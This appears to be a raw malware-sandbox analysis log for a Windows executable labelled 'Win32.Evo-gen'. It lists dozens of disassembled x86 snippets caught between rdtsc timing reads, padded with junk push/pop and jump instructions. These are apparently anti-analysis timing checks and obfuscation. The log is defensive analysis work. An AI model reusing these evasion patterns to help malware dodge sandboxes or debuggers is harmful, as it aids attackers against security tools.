Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A7E second address: D67B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F788h 0x00000008 jmp 00007FC734E5F781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC734E5F778h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244C644h] 0x00000031 jmp 00007FC734E5F789h 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d jmp 00007FC734E5F77Dh 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67BD8 second address: D67BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DAD second address: D57DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DB7 second address: D57DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DBB second address: D57DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FC734E5F776h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC734E5F776h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D865C5 second address: D865D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D865D0 second address: D865D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57D94 second address: D57DA3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DA3 second address: D57DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8689D second address: D868A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D86F69 second address: D86F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D86F7F second address: D86F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D86F85 second address: D86F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D870F1 second address: D870FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D870FC second address: D87101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8728D second address: D87298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D87852 second address: D8787F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC734E5F77Eh 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FC734E5F776h 0x0000001b jmp 00007FC734E5F782h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C234 second address: D8C239 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C3A3 second address: D8C3EA instructions: 0x00000000 rdtsc 0x00000002 js 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC734E5F786h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FC734E5F789h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C3EA second address: D8C40C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C40C second address: D8C413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C413 second address: D8C419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8ACD6 second address: D8ACDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8ACDA second address: D8ACE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC734882076h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8ACE8 second address: D8ACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C4EC second address: D8C4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92C74 second address: D92C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92C7E second address: D92CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882088h 0x00000007 jmp 00007FC73488207Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FC734882076h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92CB8 second address: D92CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92CBC second address: D92CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FC734882080h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9680C second address: D96811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96811 second address: D96816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D968B2 second address: D968B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D968B7 second address: D968E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FC734882082h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96F30 second address: D96F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974AD second address: D974C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC73488207Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974C2 second address: D974D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 xchg eax, ebx 0x00000007 sbb si, 4817h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974D5 second address: D974D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974D9 second address: D974E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D979AD second address: D979B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D97B35 second address: D97B5F instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FC734E5F788h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D98A2C second address: D98A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D98A32 second address: D98A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and esi, 7130E349h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC734E5F778h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub edi, dword ptr [ebp+122D3A8Ah] 0x00000033 push 00000000h 0x00000035 mov esi, edi 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC734E5F782h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D98A88 second address: D98A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99AE8 second address: D99AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99AED second address: D99B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734882076h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 jl 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f stc 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FC734882078h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jmp 00007FC734882082h 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D3347h], edx 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99B52 second address: D99B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99B58 second address: D99B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99B80 second address: D99B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9A34F second address: D9A353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9B067 second address: D9B06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D52D8F second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA08DC second address: DA08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA08F6 second address: DA08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA181C second address: DA1820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9D6AE second address: D9D6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA1820 second address: DA182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA2766 second address: DA27CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC734882078h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push esi 0x00000011 je 00007FC734882076h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 nop 0x0000001a xor ebx, 652B1A5Ah 0x00000020 push 00000000h 0x00000022 sub dword ptr [ebp+1244A874h], esi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FC734882078h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2CB1h], edx 0x0000004a mov edi, dword ptr [ebp+122D1C75h] 0x00000050 push eax 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC734882081h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA27CD second address: DA27D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA3736 second address: DA373C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA373C second address: DA3740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA5711 second address: DA5715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA4A80 second address: DA4A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA57B9 second address: DA57C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC734882076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA777B second address: DA7793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F784h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78CB second address: DA78CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78CF second address: DA78D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA8744 second address: DA8753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC734882076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78D9 second address: DA78E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA8753 second address: DA8757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78E3 second address: DA78E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAA65D second address: DAA663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAA663 second address: DAA701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007FC734E5F77Ch 0x0000000d nop 0x0000000e jnc 00007FC734E5F77Bh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FC734E5F778h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov dword ptr [ebp+1244C80Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FC734E5F778h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 jmp 00007FC734E5F786h 0x00000057 jns 00007FC734E5F77Ch 0x0000005d xchg eax, esi 0x0000005e pushad 0x0000005f jnl 00007FC734E5F77Ch 0x00000065 push edi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAB612 second address: DAB616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAB616 second address: DAB69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 clc 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC734E5F778h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 sub di, EAEAh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FC734E5F778h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 jmp 00007FC734E5F77Eh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007FC734E5F780h 0x00000053 jmp 00007FC734E5F77Dh 0x00000058 popad 0x00000059 rdtsc
